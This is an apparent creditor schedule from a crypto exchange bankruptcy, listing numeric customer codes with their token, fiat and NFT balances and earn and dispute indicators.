| 07345141 | | CUSDT[7], DOGE[1], USD[0.00], USDT[0] | | |
| 07345142 | | USD[10.00] | | |
| 07345143 | | BTC[.00015348], CUSDT[2], DOGE[14942.02113974], ETH[.0023401], ETHW[.00231274], GRT[99.73268365], SOL[2.81117187], TRX[292.74667631], USD[0.00], USDT[8.6439382] | Yes | |
| 07345144 | | USD[10.00] | | |
| 07345145 | | CUSDT[1], DOGE[.00002637], USD[29.80] | | |
| 07345146 | | BRZ[3], CUSDT[3], GRT[1.00312819], MATIC[188.51020054], SHIB[1], TRX[5], USD[0.01] | Yes | |
| 07345147 | | BAT[1.01655549], DOGE[17612.0400659], USD[0.00] | Yes | |
| 07345149 | | USD[10.00] | | |
| 07345150 | | USD[10.00] | | |
| 07345151 | | BRZ[1], TRX[1144.97287594], USD[0.00] | | |
| 07345152 | | USD[0.00] | | |
| 07345153 | | BCH[0], BRZ[1], BTC[0.00000003], CUSDT[8], DOGE[1], SOL[.03234222], TRX[2], USD[0.95] | Yes | |
| 07345154 | | CUSDT[1], USD[0.00] | | |
| 07345155 | | BCH[.00003056], DOGE[0], KSHIB[0], SHIB[0], SOL[0], USD[0.00] | Yes | |
| 07345156 | | USD[10.00] | | |
| 07345157 | | USD[10.00] | | |
| 07345158 | | BAT[16.06187574], CUSDT[4], DOGE[43.85962776], TRX[3], USD[0.00] | | |
| 07345159 | | USD[10.00] | | |
| 07345160 | | USD[10.92] | Yes | |
| 07345162 | | CUSDT[1], USD[0.00] | | |
| 07345163 | | USD[0.00] | | |
| 07345166 | | DOGE[143.06213045], USD[0.00] | | |
| 07345167 | | USD[0.00] | | |
| 07345170 | | BRZ[1], CUSDT[3], DOGE[6], TRX[1], USD[0.00] | | |
| 07345171 | | ETH[.00466761], ETHW[.00466761], USD[0.00] | | |
| 07345172 | | USD[10.00] | | |
| 07345173 | | DOGE[32.01151086], USD[0.00] | Yes | |
| 07345174 | | BRZ[0], DOGE[1], USD[0.00] | Yes | |
| 07345175 | | TRX[82.25786524], USD[0.00] | Yes | |
| 07345177 | | BCH[.85088216], BRZ[1], CUSDT[14], DOGE[3], SHIB[4], SOL[1.1429399], SUSHI[26.65880976], USD[0.00], USDT[1.09725584] | Yes | |
| 07345178 | | DOGE[2], ETH[.00000021], ETHW[.00000021], SHIB[1], USD[0.00], USDT[0] | Yes | |
| 07345179 | | USD[10.00] | | |
| 07345180 | | USD[10.00] | | |
| 07345181 | | BRZ[2], CUSDT[3], TRX[1], USD[0.00] | | |
| 07345183 | | USD[0.00], USDT[0] | | |
| 07345184 | | BRZ[2], CUSDT[18], DOGE[543.98063089], TRX[9], USD[0.00], USDT[0] | | |
| 07345185 | | BRZ[3], CUSDT[7], DOGE[1], TRX[1.10988379], USD[0.01] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07345186 | | USD[10.00] | | |
| 07345187 | | USD[10.00] | | |
| 07345188 | | USD[0.01] | | |
| 07345190 | | ETH[.0053429], ETHW[.0053429], USD[0.00] | | |
| 07345191 | | DOGE[.00008323], LTC[.00009452], TRX[3], USD[0.00] | Yes | |
| 07345192 | | BAT[1], CUSDT[479.32014993], DAI[24.85133582], DOGE[2000.45803232], GRT[75.60329577], KSHIB[528.69827083], SHIB[527426.16033755], TRX[1242.3540243], USD[0.00] | | |
| 07345193 | | USD[10.00] | | |
| 07345194 | | CUSDT[3], DOGE[1], TRX[.00000141], USD[0.00] | Yes | |
| 07345195 | | BRZ[1], CUSDT[1], TRX[3], USD[0.02] | | |
| 07345196 | | DOGE[4618.29317605], GRT[1.00312819], USD[28.39] | Yes | |
| 07345197 | | USD[10.00] | | |
| 07345198 | | USD[10.00] | | |
| 07345200 | | USD[10.00] | | |
| 07345201 | | DOGE[1], ETH[.18049688], ETHW[.18049688], USD[10.00] | | |
| 07345202 | | BRZ[1], BTC[0], CUSDT[18], DOGE[0], SOL[0], SUSHI[0], TRX[15], USD[0.62] | | |
| 07345203 | | DOGE[136.83407814], USD[0.00] | | |
| 07345204 | | USD[10.00] | | |
| 07345205 | | DOGE[ 95002716], USD[0.00] | | |
| 07345206 | | USD[10.00] | | |
| 07345207 | | SOL[.00017367], USD[0.01] | Yes | |
| 07345208 | | BTC[.00118056], DOGE[1], ETH[.02811852], ETHW[.02811852], USD[0.04] | | |
| 07345209 | | USD[10.00] | | |
| 07345210 | | GRT[13.80006915], USD[0.00] | | |
| 07345211 | | MATIC[.35215108], USD[0.00] | Yes | |
| 07345212 | | USD[10.00] | | |
| 07345213 | | BAT[2], BRZ[2], CUSDT[7], GRT[1], TRX[9], USD[0.01] | | |
| 07345214 | | BTC[0], DOGE[.00018397], USD[0.00] | | |
| 07345215 | | CUSDT[1], DOGE[16318.2996525], LINK[6.42471949], TRX[5581.22787191], USD[0.11], USDT[1.10863751] | Yes | |
| 07345216 | | BTC[0], CUSDT[2], DOGE[3], ETH[0], GRT[0], SOL[0], SUSHI[0.58772032], TRX[4], USD[0.00], YFI[0] | | |
| 07345217 | | USD[10.00] | | |
| 07345218 | | USD[10.00] | | |
| 07345219 | | DOGE[1], TRX[3243.37240019], USD[0.00] | | |
| 07345220 | | USD[0.00] | | |
| 07345221 | | SHIB[1], USD[0.00] | Yes | |
| 07345222 | | BRZ[1], DOGE[3], SHIB[1], USD[0.00], USDT[0] | | |
| 07345223 | | USD[10.97], XRP[3419.909837] | Yes | |
| 07345224 | | USD[10.00] | | |
| 07345225 | | DOGE[711.41748556], USD[0.00] | | |
| 07345226 | | DOGE[1], USD[0.00] | | |
| 07345227 | | USD[10.00] | | |
| 07345228 | | USD[10.00] | | |
| 07345229 | | USD[10.00] | | |
| 07345230 | | DOGE[.00000482], USD[0.00], USDT[0] | | |
| 07345231 | | CUSDT[2], DOGE[50.15876483], KSHIB[1828.63444612], USD[1.59] | Yes | |
| 07345232 | | USD[10.00] | | |
| 07345233 | | USD[10.00] | | |
| 07345234 | | CUSDT[2], DOGE[1], USD[0.00] | | |
| 07345235 | | BRZ[2.00001568], BTC[0], CUSDT[7], DOGE[.11865174], ETH[0.00000001], ETHW[1.10932302], NFT (415808786884924458/Doak Walker's Playbook: SMU vs. Santa Clara - September 27, 1947 #55)[1], NFT (443664626287404743/Doak Walker's Playbook: Texas vs. SMU - November 1, 1947 #55)[1], NFT (454080941014195342/Earl Campbell's Playbook: Rice vs. Texas - October 1st, 1977 #60)[1], NFT (459959540211195260/Earl Campbell's Playbook: LA Rams vs Houston Oilers - September 4th, 1978 #60)[1], NFT (511101518580180146/Doak Walker's Playbook: Detroit Lions vs. Cleveland Browns - December 28, 1952 #47)[1], NFT (515040107456744224/Earl Campbell's Playbook: Texas vs. Houston - November 5th, 1977 #79)[1], NFT (555057259480693872/Earl Campbell's Playbook: Houston Oilers vs. Chicago Bears - November 16, 1980 #73)[1], NFT (566158062822751517/Doak Walker's Playbook: Cleveland Brown vs. Detroit Lions - December 27, 1953 #63)[1], USD[0.00], USDT[0] | Yes | |
| 07345236 | | BRZ[0], CUSDT[0], DOGE[0], GRT[0], SOL[0], TRX[0], USD[0.00], USDT[0] | | |
| 07345237 | | SOL[.00154809], USD[0.26], USDT[0] | Yes | |
| 07345238 | | DOGE[419.16834837], USD[0.00], USDT[0.00000001] | Yes | |
| 07345239 | | CUSDT[1], DOGE[159.51744361], SOL[5.90101429], TRX[1], UNI[2.46242897], USD[0.00] | | |
| 07345240 | | BTC[0], CUSDT[1], DOGE[0], ETH[0], SHIB[6.23141448], USD[0.01], USDT[0] | | |
| 07345241 | | BAT[3.01782299], BRZ[5.07952967], CUSDT[76.64947948], DOGE[14.54005889], GRT[14.00736973], LINK[.00158786], MATIC[52.41341119], SHIB[829923.69964358], TRX[22.30933608], UNI[.21726981], USD[0.00], USDT[0] | Yes | |
| 07345242 | | USD[10.90] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07345243 | | TRX[1], USD[0.00], YFI[.00000001] | | |
| 07345244 | | BAT[10.80661153], DOGE[2715.03299114], USD[0.00] | | |
| 07345245 | | BAT[2.01140875], BRZ[3], CUSDT[5], DOGE[3.03598394], GRT[1.15056899], SHIB[8], SOL[.0001149], SUSHI[.24506892], TRX[6.48893493], UNI[.04201613], USD[0.01] | Yes | |
| 07345246 | | BRZ[2], CUSDT[2], GRT[4.74493238], TRX[4], USD[0.00], USDT[1] | | |
| 07345247 | | DOGE[18.12072202], USD[0.00] | | |
| 07345248 | | USD[10.00] | | |
| 07345249 | | USD[10.00] | | |
| 07345250 | | USD[0.00] | | |
| 07345252 | | USD[10.00] | | |
| 07345253 | Contingent, Disputed | TRX[1], USD[0.00] | Yes | |
| 07345254 | | CUSDT[6], DOGE[2743.35788818], USD[0.56] | | |
| 07345255 | | USD[10.00] | | |
| 07345256 | | BTC[.00258784], DOGE[1184.12070951], ETH[.25795497], ETHW[.25795497], SHIB[1346602.74634852], USD[0.00] | | |
| 07345257 | | AUD[0.00], AVAX[0], BCH[0], BRZ[2], BTC[0.00508863], CAD[0.00], CUSDT[15], DAI[0], DOGE[5], ETH[0.00000027], EUR[0.00], GBP[0.00], LINK[0], LTC[0], MATIC[0], NFT [367186378515866356/Dragon][1], NFT [412169628895089435/ALPHA:RONIN #1002][1], NFT [437737159568258393/3D CATPUNK #344][1], NFT [440942014952216378/ALPHA:RONIN #146][1], NFT [496467378450681914/Samurai Studies 01][1], PAXG[0], SGD[0.00], SHIB[4], SOL[0.00300000], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07345259 | | CUSDT[1], DOGE[199.82926587], ETH[.05431], ETHW[.05431], TRX[1], USD[0.00] | | |
| 07345259 | | USD[10.00] | | |
| 07345260 | | CUSDT[1], DOGE[2144.60850708], USD[0.00] | | |
| 07345262 | | USD[0.29] | | |
| 07345263 | | USD[10.00] | | |
| 07345264 | | BAT[1162.73169287], BRZ[1], CUSDT[5], DOGE[8.48984398], ETH[2.25840191], ETHW[2.25745339], GRT[693.74634769], LINK[120.99978603], TRX[7093.63399313], UNI[17.55326267], USD[0.80], USDT[1.106215811], YFI[.01088448] | Yes | |
| 07345265 | | BRZ[1], BTC[0], CUSDT[2], DOGE[0], USD[0.01] | Yes | |
| 07345266 | | BAT[1], BRZ[5], CUSDT[6], SHIB[1], TRX[3], USD[943.72], USDT[2] | | |
| 07345267 | | USD[10.00] | | |
| 07345268 | | USD[10.00] | | |
| 07345269 | | USD[7.45] | | |
| 07345270 | | CUSDT[1], DOGE[22.70756593], USD[0.00] | | |
| 07345272 | | USD[10.00] | | |
| 07345273 | | USD[10.00] | | |
| 07345274 | | USD[10.00] | | |
| 07345275 | | USD[10.00] | | |
| 07345277 | | USD[10.00] | | |
| 07345278 | | BRZ[3], CUSDT[7], DOGE[14822.12251348], GRT[2.00298162], SOL[0], SUSHI[1.08503914], TRX[6], USD[0.01], USDT[2.17104944] | Yes | |
| 07345279 | | CUSDT[2], GRT[21.74351895], SOL[.16098505], USD[24.94] | Yes | |
| 07345280 | | BCH[0], BTC[0], CUSDT[9], DOGE[323.86290488], LINK[0], LTC[0], SOL[0], USD[0.01] | Yes | |
| 07345281 | | USD[10.00] | | |
| 07345282 | | BAT[1], BRZ[4], CUSDT[4], TRX[9], USD[40.17] | | |
| 07345283 | | USD[0.00] | | |
| 07345284 | | USD[30.80] | | |
| 07345285 | | USD[10.00] | | |
| 07345286 | | DOGE[0], ETH[.00000001], ETHW[0], SHIB[812705.05792538], USD[0.00], USDT[0.00002828] | | |
| 07345287 | | USD[10.00] | | |
| 07345288 | | USD[10.00] | | |
| 07345289 | | USD[10.00] | | |
| 07345290 | | USD[10.00] | | |
| 07345292 | | CUSDT[4], DOGE[1096.08681125], TRX[2], USD[0.00], USDT[0.00238024] | Yes | |
| 07345293 | | BTC[0], CUSDT[3], DOGE[0], LTC[0], SOL[0], TRX[0], USD[0.00] | | |
| 07345294 | | BTC[.00053224], CUSDT[7], TRX[1], USD[0.00] | | |
| 07345295 | | DOGE[667.98593059], USD[10.00] | | |
| 07345296 | | USD[10.00] | | |
| 07345297 | | BRZ[1], DOGE[1.58728569], USD[100.62] | | |
| 07345298 | | USD[10.00] | | |
| 07345299 | | USD[10.00] | | |
| 07345300 | | USD[10.00] | | |
| 07345302 | | USD[10.00] | | |
| 07345303 | | USD[0.01] | | |
| 07345304 | | USD[10.00] | | |
| 07345306 | | USD[0.00], USDT[0] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07345307 | | USD[10.00] | | |
| 07345308 | | DOGE[0], USD[0.00] | | |
| 07345309 | | USD[10.00] | | |
| 07345310 | | USD[10.00] | | |
| 07345311 | | BAT[1], BRZ[1], CUSDT[11], DOGE[3368.04536595], SHIB[3], TRX[8], USD[0.01], USDT[1.05860236] | Yes | |
| 07345312 | | BTC[0], DOGE[0], ETH[0.00000001], ETHW[0], USD[0.10] | | |
| 07345313 | | DOGE[1], LTC[0], USD[0.00] | | |
| 07345314 | | BRZ[1], CUSDT[3], DOGE[0], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07345315 | | USD[10.00] | | |
| 07345316 | | BRZ[1], CUSDT[5], TRX[1734.02444327], USD[0.00] | | |
| 07345317 | | CUSDT[1], DOGE[7203.74324379], TRX[1], USD[0.00] | Yes | |
| 07345318 | | CUSDT[4], TRX[1], USD[0.00] | Yes | |
| 07345320 | | BCH[.01905987], DOGE[922.81604767], ETH[.01508037], ETHW[.01508037], LTC[.07663103], PAXG[.00266383], USD[20.00] | | |
| 07345321 | | BTC[.00000485], CUSDT[1], DOGE[2154.96925172], USD[0.00] | | |
| 07345322 | | DOGE[2126.65215268], TRX[2], USD[3.71], USDT[1] | | |
| 07345323 | | USD[10.00] | | |
| 07345324 | | DOGE[1], SHIB[1], USD[5.84] | Yes | |
| 07345325 | | BAT[.00000754], CUSDT[1], DOGE[1], USD[0.01] | | |
| 07345326 | | USD[10.00] | | |
| 07345327 | | BRZ[2], CUSDT[21], DOGE[11.47480905], ETHW[0], NFT (354187574417900669/Humpty Dumpty #598)[1], SHIB[2], USD[0.01], USDT[0.00000001] | Yes | |
| 07345328 | | USD[10.00] | | |
| 07345329 | | SHIB[3], USD[0.01] | | |
| 07345330 | | ETH[.000756], ETHW[.000756], SOL[5.72673239], USD[0.00], USDT[0.00000014] | | |
| 07345331 | | BRZ[2], CUSDT[3], DOGE[.73393902], GRT[1], SOL[.00098642], TRX[18.01457345], USD[5.00] | | |
| 07345333 | | USD[10.00] | | |
| 07345334 | | BAT[28.08341735], BRZ[1], BTC[.00121571], CUSDT[482.96838189], DOGE[414.36228318], ETH[.00573811], ETHW[.00573811], GRT[4.87715997], KSHIB[139.71040547], LTC[.03590521], MATIC[4.62403337], SHIB[144009.21658986], SOL[.99961174], SUSHI[1.14937674], TRX[191.73777143], USD[2.01] | | |
| 07345335 | | SHIB[390.09273903], USD[0.00] | Yes | |
| 07345336 | | USD[10.00] | | |
| 07345337 | | USD[10.00] | | |
| 07345338 | | DOGE[153.88493832], USD[0.00] | Yes | |
| 07345339 | | BTC[0], SUSHI[.487337] | | |
| 07345340 | | BRZ[1], CUSDT[1], DOGE[19273.0923105], TRX[1], USD[0.00] | | |
| 07345341 | | BTC[.00000473], ETHW[0.00168816], NFT (305052275988528959/Australia Ticket Stub #1673)[1], NFT (334465354388102309/Barcelona Ticket Stub #1594)[1], SHIB[1], SOL[0], USD[0.00] | Yes | |
| 07345342 | | BRZ[0], BTC[0], DOGE[0.96894690], ETH[0], SUSHI[0], USD[0.00] | | |
| 07345343 | | BTC[0], DOGE[0.00011037], ETH[0.00093074], ETHW[0.00091706], SUSHI[0], USD[0.00] | Yes | |
| 07345344 | | BRZ[0], CUSDT[1], GRT[0], TRX[1], USD[0.01] | | |
| 07345345 | | USD[10.00] | | |
| 07345346 | | USD[10.00] | | |
| 07345347 | | BRZ[1], BTC[.00000001], CUSDT[14], USD[0.00], USDT[0] | | |
| 07345348 | | DOGE[26.63493767], USD[0.00] | | |
| 07345349 | | BTC[0], DOGE[0.43716952], USD[0.35] | | |
| 07345350 | | DOGE[1], ETH[0], SHIB[0], SOL[0.00000615], TRX[1], USD[0.00] | Yes | |
| 07345351 | | USD[10.00] | | |
| 07345352 | | SHIB[302480.33877797], USD[0.00] | | |
| 07345353 | | USD[10.00] | | |
| 07345354 | | USD[10.00] | | |
| 07345355 | | CUSDT[9], ETH[0], TRX[1], USD[0.00] | | |
| 07345356 | | BTC[0], DOGE[ 18211807], USD[0.00] | | |
| 07345357 | | USD[10.00] | | |
| 07345358 | | DOGE[144.89784267], USD[0.00] | | |
| 07345359 | | CUSDT[1], DOGE[1], USD[0.00] | Yes | |
| 07345360 | | USD[10.00] | | |
| 07345361 | | CUSDT[1], USD[0.48], USDT[0] | Yes | |
| 07345362 | | BTC[.00018306], USD[0.00] | | |
| 07345363 | | USD[10.00] | | |
| 07345364 | | DOGE[64.91140714], ETH[.00000109], ETHW[.00000109], NFT (507474534382606119/Entrance Voucher #2345)[1], USD[0.00] | Yes | |
| 07345365 | | USD[0.00], USDT[0] | | |
| 07345366 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07345367 | | DOGE[32.86697505], USD[0.00] | | |
| 07345368 | | CUSDT[2], DOGE[2], TRX[1.24112726], USD[0.17], YFI[.01193408] | | |
| 07345369 | | CUSDT[4], DOGE[1], SOL[.04713245], USD[0.92] | Yes | |
| 07345370 | | BRZ[1], BTC[.00238372], ETH[.07089123], ETHW[.07001166], TRX[1], USD[0.01] | Yes | |
| 07345371 | | USD[10.00] | | |
| 07345372 | | USD[10.00] | | |
| 07345373 | | USD[10.00] | | |
| 07345374 | | BRZ[1], CUSDT[3], DOGE[74.73307385], SUSHI[.00000684], TRX[.00039749], USD[0.21], USDT[0.00002227] | | |
| 07345375 | | USD[10.00] | | |
| 07345376 | | DOGE[370.24941106], SOL[.46335848], SUSHI[.34392348], USD[16.00] | | |
| 07345377 | | USD[0.00] | | |
| 07345378 | | DOGE[3718.25049293], USD[0.00] | Yes | |
| 07345379 | | USD[10.00] | | |
| 07345380 | | USD[10.00] | | |
| 07345381 | | BRZ[1], DOGE[1], SHIB[686832.12567849], USD[0.00] | | |
| 07345382 | | USD[10.00] | | |
| 07345383 | | USD[10.00] | | |
| 07345384 | | DOGE[1], USD[0.01] | | |
| 07345385 | | BCH[0], BTC[0], DOGE[83.59253078], ETH[0], LTC[0], SOL[0], USD[0.00], USDT[0] | | |
| 07345386 | | BCH[0], BTC[0], CUSDT[4], DOGE[0], ETH[0.00259221], ETHW[0.00259221], SHIB[42237.72972972], SUSHI[0], TRX[1], USD[0.01] | | |
| 07345387 | | BAT[1], CUSDT[3], DOGE[2], ETH[0], TRX[1], USD[0.00] | | |
| 07345389 | | BAT[2.08491259], BRZ[1], DOGE[1], GRT[1.00367791], USD[0.00], USDT[1.09501353] | Yes | |
| 07345391 | | USD[10.00] | | |
| 07345392 | | USD[10.00] | | |
| 07345394 | | CUSDT[3], DOGE[35.83876837], SUSHI[1.58285981], TRX[196.97216231], USD[0.00] | Yes | |
| 07345395 | | USD[10.00] | | |
| 07345396 | | USD[10.00] | | |
| 07345397 | | BAT[0], BTC[0], CUSDT[3], DOGE[0], LINK[0], USD[0.00] | | |
| 07345398 | | TRX[1], USD[0.19] | | |
| 07345399 | | USD[10.00] | | |
| 07345400 | | USD[10.00] | | |
| 07345401 | | BRZ[1], CUSDT[1], DOGE[1], USD[0.01] | | |
| 07345402 | | BRZ[2], BTC[.00000001], USD[21.96] | | |
| 07345403 | | BTC[.00000003], CUSDT[2], ETH[0], NFT (557860172957278272/Humpty Dumpty #659)[1], SOL[.00000147], TRX[1], USD[0.00] | Yes | |
| 07345404 | | BTC[.0117849], CUSDT[4], DOGE[1], SHIB[2.66951132], TRX[13217.32724035], USD[0.00] | Yes | |
| 07345405 | | BCH[0], ETHW[1.18237674], NFT (443370209878398428/FTX - Off The Grid Miami #6913)[1], PAXG[.06171503], USD[7995.77], USDT[0] | Yes | |
| 07345406 | | USD[10.00] | | |
| 07345407 | | USD[10.00] | | |
| 07345408 | | USD[10.00] | | |
| 07345409 | | BRZ[0], DOGE[0], LINK[0], USD[0.00], USDT[0] | | |
| 07345410 | | USD[0.00] | | |
| 07345411 | | BRZ[3], CUSDT[16], DOGE[288.83281533], GRT[3], SHIB[1], TRX[13], USD[4.44] | | |
| 07345412 | | DOGE[1803.37807267], USD[10.00] | | |
| 07345413 | | USD[0.00], USDT[0.00000001] | Yes | |
| 07345414 | | BAT[.00355341], CUSDT[6], DOGE[.36137657], USD[0.00] | | |
| 07345415 | | USD[10.00] | | |
| 07345416 | | USD[10.00] | | |
| 07345418 | | GRT[5.04711244], NFT (292094116499271787/Entrance Voucher #1860)[1], TRX[1], USD[0.00] | | |
| 07345419 | | USD[0.00] | Yes | |
| 07345420 | | BAT[1.01526596], BRZ[1], CUSDT[9], DOGE[4096.48545699], GRT[434.94351373], KSHIB[1466.17741303], MATIC[377.64048977], NFT (565709959301040954/DOTB #3879)[1], SHIB[1591299.41422211], SOL[0.15322415], TRX[7923.22107590], UNI[10.39110388], USD[0.00], USDT[0] | Yes | |
| 07345421 | | AUD[37.09], BRZ[1], BTC[.00369218], CUSDT[11], DOGE[846.82079551], ETH[.0586928], ETHW[.05796572], TRX[2], USD[0.59] | Yes | |
| 07345422 | | BRZ[1], DOGE[0], LTC[0], TRX[0], USD[0.00] | Yes | |
| 07345423 | | CUSDT[1], ETH[.0821133], ETHW[.08110198], SHIB[3], USD[0.01] | Yes | |
| 07345424 | | DOGE[133.92589291], USD[10.00] | | |
| 07345425 | | USD[10.00] | | |
| 07345426 | | USD[10.00] | | |
| 07345427 | | SUSHI[.52280988], USD[0.00] | | |
| 07345428 | | BRZ[1], CUSDT[6], TRX[2], USD[0.00], USDT[2] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07345429 | | BRZ[1], CUSDT[10], USD[0.00] | | |
| 07345430 | | BRZ[1], CUSDT[1], DOGE[5.02190211], ETH[.00000001], ETHW[.00000001], USD[0.00], USDT[0] | | |
| 07345431 | | BRZ[1], CUSDT[3], DOGE[4.01265918], SHIB[10622531.05333009], SOL[0], TRX[1], USD[0.00] | Yes | |
| 07345433 | | DOGE[139.31092359], USD[0.00] | | |
| 07345435 | | BRZ[0], BTC[0], CUSDT[2], DOGE[1], ETH[0], ETHW[0], TRX[2], UNI[0], USD[0.80] | | |
| 07345436 | | DOGE[48.61261067], USD[0.00] | | |
| 07345437 | | USD[10.00] | | |
| 07345438 | | USD[10.00] | | |
| 07345439 | | USD[10.00] | | |
| 07345440 | | USD[0.00], USDT[0] | | |
| 07345441 | | USD[10.00] | | |
| 07345442 | | USD[10.00] | | |
| 07345443 | | USD[0.00] | | |
| 07345445 | | DOGE[125.19546141], USD[0.00] | | |
| 07345446 | | CUSDT[4], TRX[1], USD[0.00] | | |
| 07345447 | | DOGE[47777.67948571], SHIB[44880318.44517291], USD[0.00] | Yes | |
| 07345449 | | BRZ[2], CUSDT[1], DOGE[4927.9610716], USD[0.01] | | |
| 07345450 | | USD[10.00] | | |
| 07345451 | | USD[10.00] | | |
| 07345452 | | USD[10.00] | | |
| 07345454 | | BRZ[1], BTC[.03519677], CUSDT[5], DOGE[1], ETH[.23013402], ETHW[0.22993031], SHIB[2], TRX[1], USD[0.00] | Yes | |
| 07345455 | | BAT[1.01655549], BRZ[7.68317991], CUSDT[14], DOGE[1], GRT[2.04359126], SHIB[3152694.19804298], SOL[1.48397082], TRX[6], USD[404.94] | Yes | |
| 07345456 | | CUSDT[2], DOGE[15538.03140791], SHIB[71660335.52543282], TRX[7410.92732878], USD[5505.55] | | |
| 07345457 | | USD[10.00] | | |
| 07345458 | | BRZ[2], BTC[.00000005], CUSDT[15], DOGE[.00002145], TRX[5.00006654], USD[0.01], USDT[1] | | |
| 07345459 | | BTC[.0006972], DOGE[819.836], ETH[.32982], ETHW[.32982], USD[35.16] | | |
| 07345460 | | USD[10.00] | | |
| 07345461 | | BAT[0], BTC[0], CUSDT[1], DOGE[0], ETH[0], SOL[0], SUSHI[0], TRX[0], USD[0.00] | | |
| 07345462 | | CUSDT[2], TRX[413.54112781], USD[0.01] | | |
| 07345464 | | BAT[8.80182131], BRZ[121.82455977], CUSDT[520.38978491], DOGE[923.25020627], GRT[107.39065596], SHIB[1], USD[0.00] | Yes | |
| 07345465 | | USD[0.32] | | |
| 07345466 | | BRZ[1], BTC[.00052179], CUSDT[4], DOGE[387.93233897], SUSHI[.19020593], TRX[3], USD[0.01] | | |
| 07345467 | | BRZ[2], BTC[.01518153], CUSDT[9], DOGE[977.27624657], ETH[.16466451], ETHW[.16426551], MATIC[27.82250028], SHIB[3], SUSHI[3.59071709], TRX[2], USD[-200.00] | Yes | |
| 07345468 | | BAT[0], BCH[0], BRZ[0], BTC[0], CUSDT[0], DAI[0], DOGE[0], ETH[0], GRT[0], LTC[0], PAXG[0], SOL[11.80934403], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07345469 | | USD[10.00] | | |
| 07345470 | | CUSDT[4], DOGE[156.82490589], SHIB[4], USD[0.00] | | |
| 07345471 | | USD[60.00] | | |
| 07345473 | | USD[10.00] | | |
| 07345474 | | USD[10.00] | | |
| 07345475 | | DOGE[5.7578413], ETH[-0.00000001], ETHW[0], TRX[.002331], USD[0.01] | Yes | |
| 07345476 | | USD[10.00] | | |
| 07345478 | | USD[0.00] | | |
| 07345479 | | UNI[0] | | |
| 07345480 | | USD[10.00] | | |
| 07345481 | | CUSDT[2.9347562], DOGE[222.45006500], GRT[10.16197809], SUSHI[.06736156], TRX[58.11706429], USD[2.23] | Yes | |
| 07345482 | | USD[10.00] | | |
| 07345483 | | TRX[67.48963527], USD[0.00] | | |
| 07345484 | | TRX[18.24668615], USD[0.00] | Yes | |
| 07345485 | | DOGE[1], USD[0.00] | | |
| 07345486 | | DOGE[0], ETH[0], USD[0.00] | | |
| 07345487 | | BTC[.0000001], CUSDT[3], ETH[.00000083], ETHW[0.00000083], SHIB[1], SOL[1.1087067], TRX[3], USD[0.01], USDT[0.02340189] | Yes | |
| 07345488 | | USD[10.00] | | |
| 07345489 | | USD[11.08] | Yes | |
| 07345491 | | CUSDT[5], USD[0.00] | | |
| 07345492 | | DOGE[200.66142017], USD[0.00] | | |
| 07345493 | | BRZ[0], GRT[0], USD[0.04] | | |
| 07345494 | | DOGE[53.66018967], TRX[85.4100247], USD[0.00], USDT[2.10877582] | | |
| 07345496 | | USD[0.68], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07345497 | | USD[10.00] | | |
| 07345498 | | CUSDT[1], DOGE[.00003375], TRX[2], USD[0.20] | | |
| 07345499 | | USD[10.00] | | |
| 07345500 | | CUSDT[2], DOGE[1], USD[0.00] | Yes | |
| 07345501 | | USD[10.00] | | |
| 07345502 | | CUSDT[3], DOGE[97.22828224], SHIB[299655.6182048], USD[0.00] | | |
| 07345503 | | USD[10.00] | | |
| 07345504 | | USD[10.00] | | |
| 07345505 | | CUSDT[1], DOGE[2], TRX[3], USD[0.71] | | |
| 07345506 | | USD[10.00] | | |
| 07345507 | | USD[10.00] | | |
| 07345508 | | BRZ[1], CUSDT[3], DOGE[2.37244686], TRX[2], USD[56.60] | | |
| 07345509 | | DOGE[117.87550733], USD[0.00] | | |
| 07345510 | | USD[10.00] | | |
| 07345511 | | USD[10.00] | | |
| 07345512 | | BRZ[3], GRT[1], USD[0.00], USDT[1] | | |
| 07345513 | | USD[10.00] | | |
| 07345514 | | CUSDT[1], DOGE[7054.43826203], USD[0.00] | | |
| 07345515 | | BCH[0], BTC[0], TRX[264.97434769], USD[0.07] | | |
| 07345516 | | USD[10.00] | | |
| 07345517 | | BTC[0] | | |
| 07345518 | | DOGE[0], GRT[0], TRX[0], USD[0.07], USDT[0] | | |
| 07345519 | | CUSDT[1], LTC[1.00038614], SHIB[277.228132], SUSHI[5.86063912], TRX[66.5482164], USD[0.00] | | |
| 07345520 | | USD[10.00] | | |
| 07345521 | | CUSDT[1], DOGE[135.82634438], USD[0.00] | | |
| 07345522 | | USD[10.00] | | |
| 07345523 | | BTC[.00299493], ETH[.05206635], ETHW[.05142227], LTC[0], MATIC[30.07724272], SHIB[2], SOL[1.52672872], TRX[1], USD[0.00] | Yes | |
| 07345524 | | USD[10.00] | | |
| 07345525 | | USD[10.00] | | |
| 07345526 | | CUSDT[2], DOGE[1658.70708684], TRX[.73528898], USD[0.00] | | |
| 07345527 | | DOGE[145.10420111], USD[0.00] | Yes | |
| 07345528 | | BAT[3], BRZ[1], CUSDT[3], GRT[1], USD[0.00], USDT[0] | | |
| 07345529 | | USD[0.00] | | |
| 07345530 | | USD[10.00] | | |
| 07345531 | | BRZ[1], CUSDT[3], DOGE[.02619594], TRX[3], USD[0.00] | | |
